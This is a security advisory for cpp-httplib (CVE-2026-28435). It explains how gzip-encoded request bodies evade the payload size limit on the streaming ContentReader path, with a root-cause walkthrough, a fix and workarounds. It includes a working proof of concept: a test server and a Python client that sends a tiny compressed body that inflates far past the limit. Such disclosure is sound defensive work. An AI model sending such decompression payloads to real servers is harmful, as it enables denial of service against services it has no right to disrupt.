
Payload size limit bypass via gzip decompression in ContentReader (streaming) allows oversized request bodies in cpp-httplib

High
yhirose published GHSA-xvfx-w463-6fpp Mar 2, 2026

Package

cpp-httplib

Affected versions

<= 0.34.0

Patched versions

0.35.0

Description

Summary

cpp-httplib (httplib.h) does not enforce Server::set_payload_max_length() on the decompressed request body when using HandlerWithContentReader (streaming ContentReader) with Content-Encoding: gzip (or other supported encodings). A small compressed payload can expand beyond the configured payload limit and be processed by the application, enabling a payload size limit bypass and potential denial of service (CPU/memory exhaustion).

This behavior is inconsistent with the non-streaming request body path (req.body), which rejects/limits oversized decompressed bodies.

Root Cause

The server request-body parsing path applies payload_max_length_ to the number of bytes read from the network (compressed bytes) inside detail::read_content_* functions. When decompress=true, detail::prepare_content_receiver wraps the receiver with a decompressor, but the size accounting/limit checks still track the compressed input length (e.g., n from the socket read), not the decompressed output length (n2 passed to the receiver after inflate).

Additionally, the decompressed-size protection ("zip bomb" guard) exists only when aggregating into req.body (non-streaming path). When applications use ContentReader (streaming), the receiver is application-provided, and no decompressed-size limit is enforced by the library.
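The flawed accounting can be illustrated with a minimal, self-contained Python sketch (stdlib zlib in gzip mode stands in for cpp-httplib's decompressor; the loop and variable names are illustrative, not the library's internals):

```python
import gzip
import zlib

PAYLOAD_MAX_LENGTH = 64 * 1024  # as with Server::set_payload_max_length()

raw = b"A" * (256 * 1024)                   # 256KB once decompressed
wire = gzip.compress(raw, compresslevel=9)  # a few hundred bytes on the wire

compressed_read = 0    # what the library's limit check counts
decompressed_seen = 0  # what the streaming receiver actually gets

decomp = zlib.decompressobj(wbits=16 + zlib.MAX_WBITS)  # gzip framing

# Simplified read loop: the limit is checked against socket (compressed)
# bytes, while the receiver is fed decompressed output.
for i in range(0, len(wire), 128):
    chunk = wire[i:i + 128]
    compressed_read += len(chunk)
    assert compressed_read <= PAYLOAD_MAX_LENGTH  # passes trivially
    decompressed_seen += len(decomp.decompress(chunk))
decompressed_seen += len(decomp.flush())

print(compressed_read, decompressed_seen)  # a few hundred vs. 262144
```

The compressed-byte check never comes close to the limit, while the receiver sees the full 256KB: exactly the mismatch between the two code paths described above.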

Technical Flow (How the bypass happens)

  1. Server::routing() detects a request with a body and constructs a ContentReader.
  2. The streaming handler (HandlerWithContentReader) is matched and invoked via dispatch_request_for_content_reader(...).
  3. Inside the ContentReader callback, the library calls:
    • read_content_with_content_receiver(...) → read_content_core(...)
    • which calls detail::read_content(strm, req, payload_max_length_, status, ..., out, decompress=true)
  4. detail::prepare_content_receiver(...) enables decompression and wraps the receiver:
    • read from socket → pass compressed bytes to decompressor
    • decompressor emits decompressed chunks to the application receiver
  5. The payload limit checks in read_content_with_length/chunked/without-length paths count the compressed bytes read from the socket, so a tiny compressed payload can inflate to a large decompressed stream and still be accepted.
  6. In contrast, the non-streaming path that builds req.body includes an explicit decompressed-size guard, so it rejects oversized decompressed bodies.

Impact

An attacker can send Content-Encoding: gzip with a very small compressed Content-Length (e.g., a few hundred bytes) that inflates to a much larger body (hundreds of KB/MB+). When the server endpoint uses HandlerWithContentReader, the application can receive and process decompressed data far beyond payload_max_length, enabling:

  • bypass of intended payload size policy,
  • increased CPU usage due to decompression work,
  • increased memory usage depending on application processing,
  • potential Denial of Service (DoS) in constrained environments or high concurrency.

Affected Configurations

  • Server-side usage of HandlerWithContentReader (Server::Post/Put/Patch/Delete overloads with ContentReader)
  • Request body decompression enabled via CPPHTTPLIB_ZLIB_SUPPORT and Content-Encoding: gzip (or another supported encoding)
  • Any deployment that relies on set_payload_max_length() as a security boundary for request body size

Proof of Concept (Reproduction)

Server (C++)

Build requires zlib (-lz) and CPPHTTPLIB_ZLIB_SUPPORT.

server64_strong.cpp

#define CPPHTTPLIB_ZLIB_SUPPORT
#include "httplib.h"
#include <iostream>
#include <cstddef>

static void print_line(const char* tag, bool ok, size_t got, size_t limit) {
  std::cout << tag
            << " ok=" << ok
            << " got=" << got
            << " payload_max_length=" << limit
            << std::endl;
}

int main() {
  httplib::Server svr;

  const size_t LIMIT = 64 * 1024; // 64KB
  svr.set_payload_max_length(LIMIT);

  // Non-streaming path (req.body). This rejects the same payload (400 in this version).
  svr.Post("/body", [LIMIT](const httplib::Request &req, httplib::Response &res) {
    print_line("[/body]", true, req.body.size(), LIMIT);
    res.status = 200;
    res.set_content("body_ok\n", "text/plain");
  });

  // Streaming path (ContentReader). This accepts and processes decompressed output > LIMIT.
  svr.Post("/stream",
           [LIMIT](const httplib::Request & /*req*/, httplib::Response &res,
                   const httplib::ContentReader &content_reader) {
             size_t total = 0;
             bool ok = content_reader([&](const char* /*data*/, size_t len) {
               total += len;   // len is decompressed bytes delivered to the callback
               return true;
             });

             print_line("[/stream]", ok, total, LIMIT);

             if (total > LIMIT) {
               std::cout << "[VULN] Decompressed body exceeded payload_max_length via ContentReader."
                         << std::endl;
             }

             res.status = 200;
             res.set_content("stream_ok\n", "text/plain");
           });

  svr.set_error_handler([](const httplib::Request&, httplib::Response &res) {
    std::cout << "[error] status=" << res.status << std::endl;
  });

  std::cout << "Listening on 127.0.0.1:18080" << std::endl;
  bool ok = svr.listen("127.0.0.1", 18080);
  std::cerr << "listen ok=" << ok << std::endl;
  return ok ? 0 : 1;
}

Build & run:

g++ -O2 -std=c++17 -pthread server64_strong.cpp -lz -o server64_strong
./server64_strong

Client (Python)

poc_gzip_strong.py

import gzip
import socket

HOST, PORT = "127.0.0.1", 18080

raw = b"A" * (256 * 1024)  # 256KB decompressed
gz = gzip.compress(raw, compresslevel=9)  # ~290 bytes compressed

def send(path: str):
    req = (
        f"POST {path} HTTP/1.1\r\n".encode() +
        b"Host: 127.0.0.1\r\n"
        b"Connection: close\r\n"
        b"Content-Encoding: gzip\r\n"
        b"Content-Length: " + str(len(gz)).encode() + b"\r\n"
        b"\r\n" + gz
    )

    s = socket.create_connection((HOST, PORT))
    s.sendall(req)

    resp = b""
    while True:
        chunk = s.recv(4096)
        if not chunk:
            break
        resp += chunk
    s.close()

    print("==== Response for", path, "====")
    print(resp.decode(errors="ignore"))

print("compressed =", len(gz), "bytes")
print("decompressed =", len(raw), "bytes")

send("/body")
send("/stream")

Run:

python3 poc_gzip_strong.py

Observed Results

  • The wire request shows a small compressed payload:

    • Content-Encoding: gzip
    • Content-Length: 290
  • /body rejects the request (400 Bad Request in this version/build).

  • /stream returns 200 OK and the server prints:

    • [/stream] ok=1 got=262144 payload_max_length=65536
    • [VULN] Decompressed body exceeded payload_max_length via ContentReader.

Expected Results

If set_payload_max_length(64KB) is configured, the server should reject any request whose effective body size after decompression exceeds 64KB, regardless of whether the application uses req.body or ContentReader.

Suggested Fix

Enforce payload_max_length_ on the decompressed output in the ContentReader / content receiver decompression path. Concretely:

  • Track total decompressed bytes emitted by the decompressor (e.g., decompressed_total).
  • If emitting the next chunk would exceed payload_max_length, abort and return 413 Payload Too Large (or equivalent), and stop further processing.
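A hedged sketch of that idea in Python (zlib standing in for the library's decompressor; `limited_decompressing_receiver` is a hypothetical name, not cpp-httplib API — the real fix would live in the C++ receiver-wrapping code in detail::prepare_content_receiver):

```python
import gzip
import zlib

PAYLOAD_MAX_LENGTH = 64 * 1024

def limited_decompressing_receiver(receiver, limit):
    """Wrap `receiver` so the *decompressed* total is capped at `limit`."""
    decomp = zlib.decompressobj(wbits=16 + zlib.MAX_WBITS)  # gzip framing
    total = 0
    def feed(compressed_chunk):
        nonlocal total
        out = decomp.decompress(compressed_chunk)
        total += len(out)
        if total > limit:
            return False  # caller aborts and responds 413 Payload Too Large
        return receiver(out)
    return feed

received = []
feed = limited_decompressing_receiver(lambda d: received.append(d) or True,
                                      PAYLOAD_MAX_LENGTH)

# Same attacker payload as in the PoC: tiny on the wire, 256KB inflated.
wire = gzip.compress(b"A" * (256 * 1024), compresslevel=9)
rejected = False
for i in range(0, len(wire), 128):
    if not feed(wire[i:i + 128]):
        rejected = True  # the oversized stream is cut off early
        break

print("rejected:", rejected)
```

The key property is that the counter tracks the decompressor's output, so the application receiver can never be handed more than `limit` bytes in total, matching the existing guard on the req.body path.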

Mitigations / Workarounds

  • Do not enable request-body decompression for endpoints that use ContentReader (e.g., reject Content-Encoding headers on those endpoints).
  • Enforce a decompressed-size limit in the application callback (count bytes and abort once a cap is reached).
  • Avoid relying on payload_max_length as a strict boundary when using ContentReader with decompression.
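The second workaround (a decompressed-size cap in the application callback) can be sketched as follows. The callback shape mirrors cpp-httplib's ContentReceiver (which gets decompressed chunks and returns false to abort reading), but the names here (`make_capped_receiver`, the 4KB chunking) are illustrative assumptions:

```python
MAX_DECOMPRESSED = 64 * 1024  # local cap, independent of payload_max_length

def make_capped_receiver(cap):
    """Return (callback, state); the callback counts decompressed bytes
    and aborts once `cap` is exceeded, as a ContentReceiver would by
    returning false."""
    state = {"total": 0, "aborted": False}
    def on_chunk(data: bytes) -> bool:
        state["total"] += len(data)
        if state["total"] > cap:
            state["aborted"] = True
            return False  # the library stops reading; handler answers 413
        return True
    return on_chunk, state

on_chunk, state = make_capped_receiver(MAX_DECOMPRESSED)

# Simulate the decompressor delivering 256KB to the callback in 4KB chunks.
delivered = True
for _ in range(64):
    if not on_chunk(b"A" * 4096):
        delivered = False
        break

print(state["aborted"], state["total"])
```

Note this only bounds what the application processes; the library still performs the decompression work, so the CPU cost of inflating the stream up to the cap remains.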

Severity

High


CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE ID

CVE-2026-28435

Weaknesses

Uncontrolled Resource Consumption (CWE-400)

The product does not properly control the allocation and maintenance of a limited resource.

Improper Handling of Highly Compressed Data (Data Amplification) (CWE-409)

The product does not handle or incorrectly handles a compressed input with a very high compression ratio that produces a large output.

Credits